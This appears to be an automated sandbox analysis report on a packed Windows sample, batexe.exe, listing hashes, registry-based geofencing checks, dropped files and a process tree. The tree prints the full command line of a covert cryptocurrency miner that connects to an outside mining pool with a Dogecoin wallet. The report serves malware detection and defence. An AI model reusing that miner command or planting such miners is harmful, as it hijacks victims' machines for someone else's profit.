73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
290s
platform
windows10-2004_x64
resource
win10v2004-20240220-ja
resource tags

arch:x64arch:x86image:win10v2004-20240220-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
20/02/2024, 19:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1888637039-960448630-940472005-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1888637039-960448630-940472005-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
2872	b2e.exe
4708	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4708	cpuminer-sse2.exe
4708	cpuminer-sse2.exe
4708	cpuminer-sse2.exe
4708	cpuminer-sse2.exe
4708	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4568-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4568 wrote to memory of 2872	4568	batexe.exe	86
PID 4568 wrote to memory of 2872	4568	batexe.exe	86
PID 4568 wrote to memory of 2872	4568	batexe.exe	86
PID 2872 wrote to memory of 1452	2872	b2e.exe	87
PID 2872 wrote to memory of 1452	2872	b2e.exe	87
PID 2872 wrote to memory of 1452	2872	b2e.exe	87
PID 1452 wrote to memory of 4708	1452	cmd.exe	90
PID 1452 wrote to memory of 4708	1452	cmd.exe	90

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4568
- C:\Users\Admin\AppData\Local\Temp\4D64.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\4D64.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\4D64.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4FF5.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1452
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4D64.tmp\b2e.exe

Filesize
6.0MB

MD5
bd2239a7cb978a0185053bff7479c967

SHA1
db41412ba5872f2da47d1079b1eb26a1fca1fb86

SHA256
fda9a63c07775dbeac59a4716e4397483965218fa1bdb6a0cf9625feae98c32a

SHA512
47eacfe8a83f859737e4ecbf2bd62885769a0f06117b7510f38e90414e82cd5b2ac649f442ac24b315370d18626ae56008fb51b92a6f20c5c52e771b9876937e

Download Submit
C:\Users\Admin\AppData\Local\Temp\4D64.tmp\b2e.exe

Filesize
2.6MB

MD5
cfd846d3c6ad2bd5eaedf04a53077cb0

SHA1
4c71561eac56854abcc7cfd2637974c38dd18447

SHA256
5ee93a9931d7838dec275a34a87a6158de84b9ed9cbbd0e0c67a5ea312cec718

SHA512
2ed6bd3cbbaff48e3155f92be41e63a6f45fc11f3e985828ed98ced1cb375554dfdece2545f5d75165b7d0243d0119bb1f52701f0ec7ff7105113fbb590b3916

Download Submit
C:\Users\Admin\AppData\Local\Temp\4D64.tmp\b2e.exe

Filesize
2.8MB

MD5
13ac31ab86c586afcb30f3b6f3bae194

SHA1
e3bdefff7c5d39766b5edf8b49b09694e3c2d180

SHA256
22890c2a6fcba93284db1da23468927b6a00c1d3144e74417bd1599d5b25d44a

SHA512
0d6d48cc36bfe8260bdb6d404ca7aa86b048036f23062983254ce4d4d8881c324b76e66839c37d479bca0e701bd343c576dab42d7d349b735a96e985419bafb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\4FF5.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.2MB

MD5
a447d122272c9a62f714c4e08b527bac

SHA1
84cc4b10caaa836b80ae4b16db78bbd8ef4f0ced

SHA256
6abffaaeaca3f9544303cf6a3f6b9cbb027aa86f18f26540eac4792ec5fd6dc2

SHA512
9d5a0b27beef9bb481b3bdf6f31228168f48e96cd210799feba429adc95dfb62318085a105a99f50e8419cb409a4b06d6ac30f6751c5de1027ea64d21694e59a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.0MB

MD5
ff91ab17b91a93072668a5ef207fecc8

SHA1
c0b80791e7edcebf81ec1a919738622c50e7fc8c

SHA256
c879e880f216a5574434d5b189f5d5fa024ada83748fb6a9a7ec88e09f930e95

SHA512
bd408064f822e5d2b439ac137513b6d058200ec3ebed60849ffd91a2fcd1c0f675e8397e891a796f1ef20b13cc49f39511745572f13b8c1cc20b1a996fdcca8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
686KB

MD5
4ddcd0aa025cb7c97f6986b652d32dd3

SHA1
3ba3d0c609b01524e4353488613ea9f780780c4a

SHA256
e83b2ca2f2765e555bb777d282d189d4f0689fb26b2062ed06a5d9b2fdc972f6

SHA512
ed1f3835f38753c542dbdf228833509b09c0c233adc56cbae54df14ae9acea280d7c45c7f8dda6fa6f2163936732358a3c3364436589b6201ff7789c2e340c5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
515KB

MD5
541640d009b4615661760944003cca96

SHA1
af4bddce1461e4ff984f27fbfc727921cb6e446f

SHA256
7f80f216f323b871e27c73633bfc4c4eb62011b0afd5e3ab706c17254f9c3cb7

SHA512
8a84708e036aea1049dd5547e6d56983fc79cf204acebf42b99395dd5091b8419008a0d87dc5dafb208a3fedf7b1e7b476190416b54594b2254806bba988d97b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
893KB

MD5
3aaa3fa14721d90c75d31e62d4db40b6

SHA1
84995a857f64b1a61a9a3f82dcc1a9512986de04

SHA256
cb349ded1060e46786aaf23220edfd099df01dbd1ce427b4dde1c943b3ef0c0c

SHA512
af37079ed3014e0af5ab2a6574a8360b0d976b3b482bebd7308d9649906751ee7f1652710f192f34ed19c3ab64eebf58c69ba70e6e79bc5293b72fa2c69325b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
735KB

MD5
f716c97279401e50acc54100a64fa8e6

SHA1
e956364a50b6d8f14d545fc02103eca32144d13d

SHA256
4ce65153e050d2290e546cb5e557dd866441dccb84952a4cc2a8f11033748933

SHA512
bd12188d84e7c3b596bc5e1689536bf551c7f686f11f103aced7c5d82f4c9848f21b2289be1047da1228383f691da8b2f061935412cd77821095ec3dc4ca2d58

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
580KB

MD5
4d5194f282223f80aa4bd155b00723fd

SHA1
c9e37e815d33c4ab56cd68aeed5304078cceac61

SHA256
542a69ca236b11003ffdce75bca6971af6ae63cbbe0d1903c5127d39e5bbe290

SHA512
33868af94f177ababf5bf736d883b153a783b570a66e8f5b961ef68ee75536f4fb7fcf4b31ce857a488a1993d25dd771d8a20bb5378a3620b8b4074445a28c12

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
692KB

MD5
1053b9c42bee3c805fe1643ee45b1b8a

SHA1
95c164af72e7faa3d9bce6e9474492de15524a44

SHA256
e7f8637fa8bd4c5b4da92c75ee3a49ee1aa42951e593544b91551730337f4950

SHA512
61c433d175f5065c364146622e133de131fae70e62bb7b40a92381c56f4993b44d2a2bd9e4a687ff61b86c9b266ca14ffa89678168f71561e31605359a9ddfdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
881KB

MD5
8f7a296169aa05d7df851b1e5a22d4fe

SHA1
a4864e85e07db4e3e3afb84f4cadd64b2baa1c20

SHA256
96dbf8d16448fec0a3a732faa595996d0f42f07a392c29cb5d5c416b823b8f73

SHA512
f9e929ffca6f2858f0e1e9903e2b634180a27e10ea83fd5a9abfe99f4c1bd7a8a84c92834cb0cce3a394d74ae9470e60dd415bd6c9ed27e02a78175e9ff7007b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
557KB

MD5
7c8f297cd4005d73f0a18a5e7e23fcff

SHA1
775fe1f57e857ec6f706e0d6395da7731d74e04b

SHA256
36d243321f616fe8505a387b65e6e087adbe50a5a36ef6975a2d92c711aea4b2

SHA512
14f8c8b7fd5adaee20bfd8808fbd2771234eadce59f30e80d6a3674a3ee4320c2006e3b7ea1a0969c5b29707537bf96bc862a70d381d4523d8f36ec07ebbeddd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2872-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2872-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4568-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4708-47-0x0000000001010000-0x00000000028C5000-memory.dmp

Filesize
24.7MB

Download
memory/4708-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-45-0x000000005C050000-0x000000005C0E8000-memory.dmp

Filesize
608KB

Download
memory/4708-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4708-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4708-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4708-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download